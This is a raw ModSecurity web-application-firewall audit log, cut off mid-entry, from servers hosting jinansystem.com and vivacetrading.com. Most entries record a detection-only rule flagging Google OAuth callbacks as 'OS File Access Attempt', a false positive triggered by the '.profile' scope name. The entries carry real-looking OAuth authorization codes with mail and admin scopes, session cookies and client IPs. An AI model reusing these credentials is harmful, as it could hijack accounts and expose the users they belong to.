x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=0cks2agr4hamlumcv2616npn63 --71bc5c22-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --71bc5c22-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHWq0dutIOpb_kg22iUbAAAABg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753339563227735 509746 (- - -) Stopwatch2: 1753339563227735 509746; combined=4727, p1=571, p2=3738, p3=189, p4=65, p5=164, sr=155, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --71bc5c22-Z-- --80950f18-A-- [24/Jul/2025:09:46:27.060065 +0300] aIHWwhukk8cgt8UnU9oFHAAAAEI 212.28.242.186 49400 127.0.0.1 7081 --80950f18-B-- GET /administration/index.php?code=4/0AVMBsJgVTnyyIl0_5kaoYm8Y2u-G8wUnbpnAvFdtIFamoNBLA5Fxea0vFfai5QUyPpWlWw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar;q=0.8 priority: u=0, i cookie: PHPSESSID=sqsemh12av2d8sbrpe98511au5 --80950f18-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --80950f18-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHWwhukk8cgt8UnU9oFHAAAAEI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753339586633890 426442 (- - -) Stopwatch2: 1753339586633890 426442; combined=4814, p1=431, p2=4056, p3=129, p4=60, p5=138, sr=153, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --80950f18-Z-- --1cc67550-A-- [24/Jul/2025:09:51:06.785948 +0300] aIHX1Rukk8cgt8UnU9oNawAAAEY 212.28.242.186 50934 127.0.0.1 7081 --1cc67550-B-- GET /administration/index.php?code=4/0AVMBsJhY-83hSVel2SP9Ga2mg6d_i1xCSeNasRPJnMBPfzS0IARCK-6G9cFJi-lNuYiKyA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar;q=0.8 priority: u=0, i cookie: PHPSESSID=a97e6ndlc7hl54r1a3pf99sgd0 --1cc67550-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --1cc67550-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHX1Rukk8cgt8UnU9oNawAAAEY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753339861314752 5471380 (- - -) Stopwatch2: 1753339861314752 5471380; combined=6617, p1=751, p2=5356, p3=205, p4=115, p5=190, sr=234, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1cc67550-Z-- --34a2746c-A-- [24/Jul/2025:09:51:54.607790 +0300] aIHYChukk8cgt8UnU9oO7QAAAEU 212.28.242.186 37364 127.0.0.1 7081 --34a2746c-B-- GET /administration/index.php?code=4/0AVMBsJg3_2-uJrt8uFXG0LyUABEIlo54L1tEMwlzPylqK12O09MRmpNJNPeJAz8J0cBYKg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=vcnndks1rak1o2i3su8uci0f80 --34a2746c-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --34a2746c-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHYChukk8cgt8UnU9oO7QAAAEU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753339914180573 427462 (- - -) Stopwatch2: 1753339914180573 427462; combined=5901, p1=951, p2=4614, p3=143, p4=64, p5=128, sr=298, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --34a2746c-Z-- --12722b61-A-- [24/Jul/2025:09:52:30.441983 +0300] aIHYLRukk8cgt8UnU9oQJQAAAFE 195.112.198.68 53652 127.0.0.1 7081 --12722b61-B-- GET /administration/index.php?code=4/0AVMBsJjfvPDpY8-PlUYYYO-_-G0oq98j6zltv0LcSNUap6YmsSa_48aVpHJYougtFTl7Yw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=qhqfl67fhcio8kki3b8kk94cq7 --12722b61-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --12722b61-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHYLRukk8cgt8UnU9oQJQAAAFE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753339949288375 1153746 (- - -) Stopwatch2: 1753339949288375 1153746; combined=4603, p1=557, p2=3692, p3=180, p4=63, p5=110, sr=138, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --12722b61-Z-- --47767f08-A-- [24/Jul/2025:09:56:46.023383 +0300] aIHZLVooLYw4or2LgWIoqQAAAM4 195.112.198.68 35132 127.0.0.1 7081 --47767f08-B-- GET /administration/index.php?code=4/0AVMBsJh7o4Xxqj5zmuMF7GgWGMCGup7KwfrqVs5m4gZyHfXVU5OSLeThRCZQOKghKDp_Bw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=lp3j3g08c95boe09s0bsionoo2 --47767f08-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --47767f08-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHZLVooLYw4or2LgWIoqQAAAM4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753340205609786 413788 (- - -) Stopwatch2: 1753340205609786 413788; combined=5633, p1=747, p2=4345, p3=251, p4=82, p5=207, sr=186, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --47767f08-Z-- --73bc5813-A-- [24/Jul/2025:09:57:08.982432 +0300] aIHZRBukk8cgt8UnU9oVRgAAAFU 54.36.148.107 52834 127.0.0.1 7081 --73bc5813-B-- GET /google.com HTTP/1.0 Host: www.vivacetrading.com X-Real-IP: 54.36.148.107 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/) accept: */* accept-encoding: deflate, gzip, br --73bc5813-F-- HTTP/1.1 200 OK Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 586 Content-Type: text/html; charset=UTF-8 --73bc5813-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.vivacetrading.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.vivacetrading.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.vivacetrading.com"] [uri "/google.com"] [unique_id "aIHZRBukk8cgt8UnU9oVRgAAAFU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/vivacetrading.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753340228954053 28452 (- - -) Stopwatch2: 1753340228954053 28452; combined=2762, p1=572, p2=2094, p3=0, p4=0, p5=96, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --73bc5813-Z-- --13cb2700-A-- [24/Jul/2025:10:02:28.805820 +0300] aIHahEdutIOpb_kg22igHAAAAA4 212.28.242.186 38900 127.0.0.1 7081 --13cb2700-B-- GET /administration/index.php?code=4/0AVMBsJiME0FNiNnQe1ExUAUmOQU-eQQhltMKR1EPBwQX8caKJTptUE9ElrbdPPBLeWSGNw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Microsoft Edge";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=7nlgdsq560g72kq61hamvclqe2 --13cb2700-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --13cb2700-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHahEdutIOpb_kg22igHAAAAA4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753340548308387 497614 (- - -) Stopwatch2: 1753340548308387 497614; combined=4563, p1=657, p2=3566, p3=128, p4=82, p5=130, sr=180, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --13cb2700-Z-- --68d48413-A-- [24/Jul/2025:10:05:33.488621 +0300] aIHbPRukk8cgt8UnU9og_wAAAEc 212.28.242.186 40602 127.0.0.1 7081 --68d48413-B-- GET /administration/index.php?code=4/0AVMBsJgxHKonb3jmKgM6kNbnQNJy2w_5W6ZRpAuVpO6py3fXseeKSbYDHnfS4VR1CtKeCg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-GB,en-US;q=0.9,en;q=0.8 priority: u=0, i cookie: PHPSESSID=n1bge5fhsbkvhbirek697od403 --68d48413-F-- HTTP/1.1 200 OK Expires: 